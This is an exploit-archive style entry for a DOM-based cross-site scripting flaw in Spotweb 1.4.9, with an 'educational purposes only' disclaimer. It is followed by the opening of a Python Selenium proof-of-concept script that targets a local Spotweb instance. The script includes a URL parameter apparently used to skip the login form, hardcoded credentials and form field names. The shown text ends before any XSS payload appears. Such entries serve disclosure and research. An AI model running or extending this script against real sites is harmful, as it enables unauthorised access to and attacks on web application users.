Spotweb 1.4.9 dom based crosssite scripting (xss) Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2021-05-21 |
Type : webapps |
Platform : multiple
This exploit / vulnerability Spotweb 1.4.9 dom based crosssite scripting (xss) is for educational purposes only and if it is used you will do on your own risk!
from selenium import webdriver
import time
import os, sys
# Vendor: https://www.nzbserver.com/
# Jump over login form :D
website_link="http://192.168.1.160/spotweb-develop/?page=login&data[htmlheaderssent]=true"
# enter your login username
username="nu11secur1ty"
# enter your login password
password="password"
#enter the element for username input field
element_for_username="loginform[username]"
#enter the element for password input field
element_for_password="loginform[password]"
#enter the element for submit button
element_for_submit="loginform[submitlogin]"
#browser = webdriver.Safari() #for macOS users[for others use chrome vis chromedriver]
browser = webdriver.Chrome() #uncomment this line,for chrome users
#browser = webdriver.Firefox() #uncomment this line,for chrome users